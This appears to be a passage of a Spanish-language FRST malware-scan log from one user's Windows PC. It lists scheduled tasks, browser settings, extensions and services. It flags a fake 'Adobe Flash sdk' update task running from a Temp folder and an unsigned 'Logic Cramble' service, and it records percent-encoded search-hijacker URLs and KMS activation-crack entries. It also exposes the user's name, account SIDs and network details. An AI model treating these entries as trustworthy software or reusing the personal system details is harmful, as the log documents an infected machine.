Task: {E29389DD-8D0F-4557-BF1A-6B61736B639E} - System32\Tasks\RealUpgradeScheduledTaskS-1-5-21-1649130365-987012723-906343211-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe
Task: {E96C7094-CDA4-4D64-9B97-EBEC24982707} - System32\Tasks\Microsoft\Windows Live\SOXE\Extractor Definitions Update Task => {3519154C-227E-47F3-9CC9-12C3F05817F1}
Task: {E9E54652-C473-4C56-83B9-E608F8FB8CA7} - System32\Tasks\{111E94BF-2FBE-4662-8EE2-E722532AD46A} => C:\Windows\system32\pcalua.exe -a "C:\Users\MARCO AVILA\AppData\Roaming\EpicNet Inc\CloudNet

\cloudnet.exe" -c /uninstall
Task: {F5463463-DA4C-4222-898B-C5DBA5360B88} - System32\Tasks\{6A8747E5-3A68-441E-982D-533C6939C771} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Xilisoft\Video Converter Ultimate 6\Uninstall.exe"
Task: {F8891381-1E66-4481-8026-D3BB981AE07A} - System32\Tasks\{F96B9AC3-8FB4-42B5-9EF3-B8BCFA1FAC64} => C:\Program Files (x86)\Common Files\DVDVideoSoft\FreeStudioManager.exe [6424120 2012-02-22] 

(DVDVideoSoft Ltd. -> DvdVideoSoft Ltd. ) [Archivo no firmado]
Task: {FFC54FF7-C9D4-40A6-959F-E9D45F8C20B0} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS.exe

(Si una entrada es incluida en el fixlist, el archivo de tarea (.job) será movido. El archivo que está siendo ejecutado por la tarea no será movido.)

Task: C:\Windows\Tasks\Adobe Flash sdk Files Update up_2020326.job => C:\Users\MARCOA~1\AppData\Local\Temp\~atmp\_9D4F.exe/check_update C:\Users\MARCO AVILA\AppData\Local\inetinfoserviceMARCO AVILA6This 

task detecct has update for sdk files.up <==== ATENCIÓN

==================== Internet (Lista blanca) ====================

(Si un elemento es incluido en el fixlist, y éste pertenece al registro, será eliminado o restaurado a su valor predeterminado.)

Winsock: Catalog5 07 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [145280 2011-03-28] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5 08 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [145280 2011-03-28] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5-x64 07 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [171392 2011-03-28] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5-x64 08 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [171392 2011-03-28] (Microsoft Corporation -> Microsoft Corp.)
Hosts: Hay más de una entrada en Hosts. Consulte la sección Hosts de Addition.txt
Tcpip\Parameters: [DhcpNameServer] 10.0.196.141 189.198.222.137 200.77.146.137
Tcpip\..\Interfaces\{4CA491EE-4CD0-45CF-BC52-51C254C4A7B1}: [NameServer] 8.8.8.8 8.8.4.4
Tcpip\..\Interfaces\{7AD1033E-FE1D-4D56-A9E9-134D6AEF16DB}: [DhcpNameServer] 10.0.196.141 200.77.146.137 200.52.170.150
Tcpip\..\Interfaces\{86463265-C657-4234-94AF-E401DE4093E0}: [DhcpNameServer] 10.0.196.141 189.198.222.137 200.77.146.137

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = 
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-1649130365-987012723-906343211-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?

p=mKO_AwFzXIpYRaHdGKBAcdbTT-oGb_ZTsWSwcXPEgtxc87bVbNFvUCtIV3lSo6Gn_3bcNUKENR4Vw-

7jVBisYV2uszdV6dakSaeMIPY2Pkr2GkRZIONN70OCf99cCSJTk6WFrjDGVfUkKdraCl3qzEJprJAEorPIf6PzgNYXqZibmgQY5QDWgjAlvbDt3QcFb1KHA3Yo&q={searchTerms}
HKU\S-1-5-21-1649130365-987012723-906343211-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?

p=mKO_AwFzXIpYRaHdGKBAcdbTT-oGb_ZTsWSwcXPEgtxc87bVbNFvUCtIV3lSo6Gn_3bcNUKENR4Vw-

7jVBisYV2uszdV6dakSaeMIPY2Pkr2GkhHkUrzx4laegF9Lsrn6cGbBWaoxAyveZb_5f6wMIg7Y3I3uS7FKPtPsc4G5boKB1HV0Dzm1ClsgtcfQ-gepV-CvwsW
SearchScopes: HKLM -> DefaultScope no se encuentra el valor
SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL = 
SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBAcdbTT-

oGb_ZTsWSwcXPEgtxc87bVbNFvUCtIV3lSo6Gn_3bcNUKENR4Vw-7jVBisYV2uszdV6dakSaeMIPY2Pkr2GkRZIONN70OCf99cCSJTk6WFrjDGVfUkKdraCl3qzEJprJAEorPIf6PzgNYXqZibmgQY5QDWgjAlvbDt3QcFb1KHA3Yo&q=

{searchTerms}
SearchScopes: HKU\S-1-5-21-1649130365-987012723-906343211-1000 -> DefaultScope {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?

p=mKO_AwFzXIpYRaHdGKBAcdbTT-oGb_ZTsWSwcXPEgtxc87bVbNFvUCtIV3lSo6Gn_3bcNUKENR4Vw-

7jVBisYV2uszdV6dakSaeMIPY2Pkr2GkRZIONN70OCf99cCSJTk6WFrjDGVfUkKdraCl3qzEJprJAEorPIf6PzgNYXqZibmgQY5QDWgjAlvbDt3QcFb1KHA3Yo&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1649130365-987012723-906343211-1000 -> {C0C3A6C6-03BC-4195-8FCB-AEA091301353} URL = hxxps://mx.search.yahoo.com/yhs/search?hspart=lvs&hsimp=yhs-

awc&type=lvs__webcompa__1_0__ya__ch_WCYID10315__171019__yaie&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1649130365-987012723-906343211-1000 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBAcdbTT-

oGb_ZTsWSwcXPEgtxc87bVbNFvUCtIV3lSo6Gn_3bcNUKENR4Vw-7jVBisYV2uszdV6dakSaeMIPY2Pkr2GkRZIONN70OCf99cCSJTk6WFrjDGVfUkKdraCl3qzEJprJAEorPIf6PzgNYXqZibmgQY5QDWgjAlvbDt3QcFb1KHA3Yo&q=

{searchTerms}
BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll [2020-01-20] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
BHO: Sin Nombre -> {13D67BB7-DB5F-48AA-884D-7A5D94168509} -> Ningún archivo
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_201\bin\ssv.dll [2019-03-01] (Oracle America, Inc. -> Oracle Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corporation -> Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office16\URLREDIR.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office16\GROOVEEX.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_201\bin\jp2ssv.dll [2019-03-01] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll [2020-01-20] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
BHO-x32: Sin Nombre -> {13D67BB7-DB5F-48AA-884D-7A5D94168509} -> Ningún archivo
BHO-x32: PlusIEEventHelper Class -> {551A852F-39A6-44A7-9C13-AFBEC9185A9D} -> C:\Program Files (x86)\Nuance\PDF Professional 7\Bin\PlusIEContextMenu.dll [2010-07-16] (Zeon Corporation -> Zeon Corporation)
BHO-x32: Aplicación auxiliar de inicio de sesión de Windows Live ID -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] 

(Microsoft Corporation -> Microsoft Corp.)
BHO-x32: IEInspector Browser Helper -> {9B43B7B1-BF56-4708-81D2-332D708B0DD9} -> C:\Program Files (x86)\IEInspector\HTTPAnalyzerFullV7\IEInspectorBHO.dll [2017-04-12] (QingHai -> IEInspector Software)
BHO-x32: Windows Live Messenger Companion Helper -> {9FDDE16B-836F-4806-AB1F-1455CBEFF289} -> C:\Program Files (x86)\Windows Live\Companion\companioncore.dll [2012-03-08] (Microsoft Corporation -> Microsoft 

Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office16\URLREDIR.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: ZeonIEEventHelper Class -> {DA986D7D-CCAF-47B2-84FE-BFA1549BEBF9} -> C:\Program Files (x86)\Nuance\PDF Professional 7\Bin\ZeonIEFavClient.dll [2011-02-16] (Zeon Corporation -> Zeon Corporation)
Toolbar: HKLM-x32 - DocuCom PDF - {E3286BF1-E654-42FF-B4A6-5E111731DF6B} - C:\Program Files (x86)\Nuance\PDF Professional 7\Bin\ZeonIEFavClient.dll [2011-02-16] (Zeon Corporation -> Zeon Corporation)
Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2018-04-10] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2018-04-10] (Microsoft Corporation -> Microsoft Corporation)
Handler: WSISAllmytubechrome - Sin valor CLSID

FireFox:
========
FF DefaultProfile: ds5ojdhh.default-1492367854850
FF ProfilePath: C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\24bww9ll.default-release [2020-03-25]
FF Extension: (Free Download Manager extension) - C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\[email protected] [2017-08-11] [Heredado]
FF ProfilePath: C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850 [2020-03-26]
FF DownloadDir: C:\Users\MARCO AVILA\Desktop
FF Homepage: Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850 -> hxxps://www.google.com.mx/
FF NewTab: Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850 -> hxxps://espanol.yahoo.com/yhs/web?hspart=lvs&hsimp=yhs-awc&type=lvs__webcompa__1_0__ya__hp_WCYID10315__171019__yaff
FF Notifications: Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850 -> hxxps://crackingportal.com; hxxps://notifications.models.xxx; hxxps://www.interjet.com
FF Extension: (English United States Dictionary) - C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850\Extensions\@unitedstatesenglishdictionary.xpi [2020-02-02]
FF Extension: (ZenMate Free VPN - Mejor VPN) - C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850\Extensions\[email protected] [2020-03-11]
FF Extension: (English (US) Language Pack) - C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850\Extensions\[email protected] [2020-03-12]
FF Extension: (FlashGot) - C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850\Extensions\{19503e42-ca3c-4c27-b1e2-9cdb2170ee34}.xpi [2017-08-22] [Heredado]
FF Extension: (Bulk Media Downloader) - C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850\Extensions\{72b2e02b-3a71-4895-886c-fd12ebe36ba3}.xpi [2017-12-09]
FF Extension: (ReminderFox) - C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850\Extensions\{ada4b710-8346-4b82-8199-5de2b400a6ae}.xpi [2017-06-26] [Heredado]
FF Extension: (Video DownloadHelper) - C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2019-07-07]
FF Extension: (HTTP Header Live) - C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850\Extensions\{ed102056-8b4f-43a9-99cd-6d1b25abe87e}.xpi [2019-08-20]
FF SearchPlugin: C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850\searchplugins\yahoo-lavasoft.xml [2017-10-19]
FF HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Internet Download Manager\idmmzcc3.xpi
FF Extension: (IDM Integration Module) - C:\Program Files (x86)\Internet Download Manager\idmmzcc3.xpi [2020-01-21]
FF HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\SeaMonkey\Extensions: [[email protected]] - C:\Users\MARCO AVILA\AppData\Roaming\IDM\idmmzcc5
FF Extension: (IDM CC) - C:\Users\MARCO AVILA\AppData\Roaming\IDM\idmmzcc5 [2020-01-24] [Heredado] [no firmado]
FF HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\SeaMonkey\Extensions: [[email protected]] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
FF Extension: (IDM integration) - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi [2017-12-20] [Heredado]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_32_0_0_255.dll [2019-09-23] (Adobe Inc. -> )
FF Plugin: @java.com/DTPlugin,version=11.201.2 -> C:\Program Files\Java\jre1.8.0_201\bin\dtplugin\npDeployJava1.dll [2019-03-01] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.201.2 -> C:\Program Files\Java\jre1.8.0_201\bin\plugin2\npjp2.dll [2019-03-01] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] (Microsoft Corporation ->  Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_255.dll [2019-09-23] (Adobe Inc. -> )
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1202122.dll [2013-04-03] (Adobe Systems, Inc.) [Archivo no firmado]
FF Plugin-x32: @cambridgesoft.com/Chem3D,version=12.0 -> C:\Program Files (x86)\CambridgeSoft\ChemOffice2010\Chem3D\npChem3DPlugin.dll [2009-05-26] (CambridgeSoft Corporation -> CambridgeSoft Corp.)
FF Plugin-x32: @cambridgesoft.com/ChemDraw,version=12.0 -> C:\Program Files (x86)\CambridgeSoft\ChemOffice2010\ChemDraw\npcdp32.dll [2009-05-26] (CambridgeSoft Corporation -> CambridgeSoft Corp.)
FF Plugin-x32: @ieinspector.com/ha_plugin -> C:\Program Files (x86)\IEInspector\HTTPAnalyzerFullV7\firefox\Components [2018-12-06] ()
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] (Microsoft Corporation ->  Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @videolan.org/vlc,version=2.2.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin-x32: ZEON/PDF,version=2.0 -> C:\Program Files (x86)\Nuance\PDF Professional 7\bin\nppdf.dll [2011-02-16] (Zeon Corporation -> Zeon Corporation)

Chrome: 
=======
CHR DefaultProfile: Profile 1
CHR Profile: C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Default [2020-03-26]
CHR HomePage: Default -> hxxp://google.com.mx/
CHR StartupUrls: Default -> "hxxp://google.com.mx/"
CHR Extension: (Tampermonkey) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Default\Extensions\dhdgffkkebhmkfjojejmpbldmpobfkfo [2017-11-14]
CHR Extension: (SingleFile Core) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Default\Extensions\jemlklgaibiijojffihnhieihhagocma [2013-06-24]
CHR Extension: (SingleFile) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Default\Extensions\mpiodijhokgodhhofbcjdecpffjipkle [2013-06-24]
CHR Extension: (Sistema de pagos de Chrome Web Store) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-11-14]
CHR Extension: (Vine Client) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Default\Extensions\oojohjpgmcfnholboljmkbcchbipcbci [2015-06-28]
CHR Extension: (Chrome Media Router) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-11-14]
CHR Profile: C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1 [2020-03-26]
CHR HomePage: Profile 1 -> hxxps://www.google.com.mx/
CHR StartupUrls: Profile 1 -> "hxxp://google.com.mx/"
CHR Extension: (Google Drive) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-16]
CHR Extension: (YouTube) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-30]
CHR Extension: (Twitter Media Downloader) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\cblpjenafgeohmnjknfhpdbdljfkndig [2020-03-15]
CHR Extension: (DownAlbum) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\cgjnhhjpfcdhbhlcmmjppicjmgfkppok [2020-03-04]
CHR Extension: (Búsqueda de Google) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-31]
CHR Extension: (Twitter) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\jgeocpdicgmkeemopbanhokmhcgcflmi [2019-08-29]
CHR Extension: (SingleFile) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\mpiodijhokgodhhofbcjdecpffjipkle [2020-03-17]
CHR Extension: (IDM Integration Module) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2020-02-05]
CHR Extension: (Sistema de pagos de Chrome Web Store) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-09-30]
CHR Extension: (Gmail) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-03-26]
CHR Extension: (Chrome Media Router) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-03-19]
CHR Profile: C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\System Profile [2020-03-26]
CHR Extension: (Presentaciones de Google) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-06-28]
CHR Extension: (Google Docs) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\aohghmighlieiainnegkcijnfilokake [2015-06-28]
CHR Extension: (Google Drive) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-06-28]
CHR Extension: (YouTube) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-06-28]
CHR Extension: (Búsqueda de Google) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-06-28]
CHR Extension: (Hojas de cálculo de Google) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-06-28]
CHR Extension: (Gmail) - C:\Users\MARCO AVILA\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-06-28]
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2020-01-21]
CHR HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [apdfllckaahabafndbhieahigkjlhalf] - C:\Users\MARCOA~1\AppData\Local\Google\Drive\user_default

\apdfllckaahabafndbhieahigkjlhalf_live.crx <no encontrado>
CHR HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo]
CHR HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh]
CHR HKLM-x32\...\Chrome\Extension: [fhjnbgadgmmffddcilnbmcieekimilcn] - <no Path/update_url>
CHR HKLM-x32\...\Chrome\Extension: [jfmjfhklogoienhpfnppmbcbjfjnkonk] - <no Path/update_url>
CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2020-01-21]

Marco · 26 Marzo, 2020 21:08

==================== Servicios (Lista blanca) ===================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

R2 backlh; C:\ProgramData\Logic Cramble\set.exe [3780096 2020-03-26] () [Archivo no firmado] <==== ATENCIÓN
S4 BstHdAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Service.exe [387128 2017-04-20] (BlueStack Systems, Inc. -> BlueStack Systems, Inc.)
S4 BstHdLogRotatorSvc; C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [369720 2017-04-20] (BlueStack Systems, Inc. -> BlueStack Systems, Inc.)
S4 BstHdPlusAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Plus-Service.exe [406584 2017-04-20] (BlueStack Systems, Inc. -> BlueStack Systems, Inc.)
S4 CG6Service; C:\Program Files\CyberGhost 6\CyberGhost.Service.exe [204880 2018-06-11] (CyberGhost SRL -> CyberGhost S.A.)
S2 CloudPrinter; C:\ProgramData\\CloudPrinter\\CloudPrinter.exe [4667392 2020-03-26] () [Archivo no firmado]
R2 ePowerSvc; C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe [786976 2009-10-02] (Acer Incorporated -> Acer Incorporated)
S4 ExpressVPNService; C:\Program Files (x86)\ExpressVPN\bootstrap\amd64\nssm.exe [438664 2019-08-21] (Express Vpn LLC -> ExpressVPN)
S3 GSService; C:\Windows\SysWOW64\GSService.exe [444640 2014-07-28] (cyan soft ltd -> )
S4 Http_analyzer_v7_netfilter; C:\Program Files (x86)\IEInspector\HTTPAnalyzerFullV7\netFilterService.exe [447384 2017-04-12] (QingHai -> )
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-03] (Macrovision Corporation) [Archivo no firmado]
R2 IsaMonitor; C:\Program Files (x86)\Asistente Infinitum\IsaMonitor.exe [185856 2008-07-23] (Fine Point Technologies, Inc.) [Archivo no firmado]
R2 KMS-R@1n; C:\Windows\[email protected] [26112 2018-11-10] () [Archivo no firmado]
S4 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe [6933272 2020-03-25] (Malwarebytes Inc -> Malwarebytes)
R2 msftesql$CSSQL05; c:\Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\msftesql.exe [95592 2007-06-22] (Microsoft Corporation -> Microsoft Corporation)
R2 MSSQL$CSSQL05; c:\Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe [29263712 2008-11-24] (Microsoft Corporation -> Microsoft Corporation)
R2 MSSQL$SQLEXPRESS; c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe [57966424 2010-09-17] (Microsoft Corporation -> Microsoft Corporation)
R2 MWLService; C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86\\MWLService.exe [305448 2009-09-10] (EGIS TECHNOLOGY INC. -> Egis Technology Inc.)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2008-12-03] (Hewlett-Packard) [Archivo no firmado]
S2 nlsvc; C:\Program Files\NetLimiter 3\nlsvc.exe [1845248 2011-03-21] (Locktime Software) [Archivo no firmado]
R2 ODDPwrSvc; C:\Program Files\Acer\Optical Drive Power Management\ODDPWRSvc.exe [158240 2009-09-04] (Acer Incorporated -> Acer Incorporated)
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2008-12-03] (Hewlett-Packard) [Archivo no firmado]
R2 RS_Service; C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe [253952 2009-07-09] (Acer Incorporated) [Archivo no firmado]
S4 SQLAgent$SQLEXPRESS; c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE [430424 2010-09-17] (Microsoft Corporation -> Microsoft Corporation)
S2 SZASSIST; C:\Program Files (x86)\Clarus\Samsung SecretZone\SZAssistSVC.exe [90112 2010-07-30] (Clarus, Inc.) [Archivo no firmado]
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [11446104 2019-04-24] (TeamViewer GmbH -> TeamViewer GmbH)
R2 UleadBurningHelper; C:\Program Files (x86)\Common Files\Ulead Systems\DVD\ULCDRSvr.exe [49152 2006-09-28] (Ulead Systems, Inc.) [Archivo no firmado]
S4 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-26] (Microsoft Windows -> Microsoft Corporation)
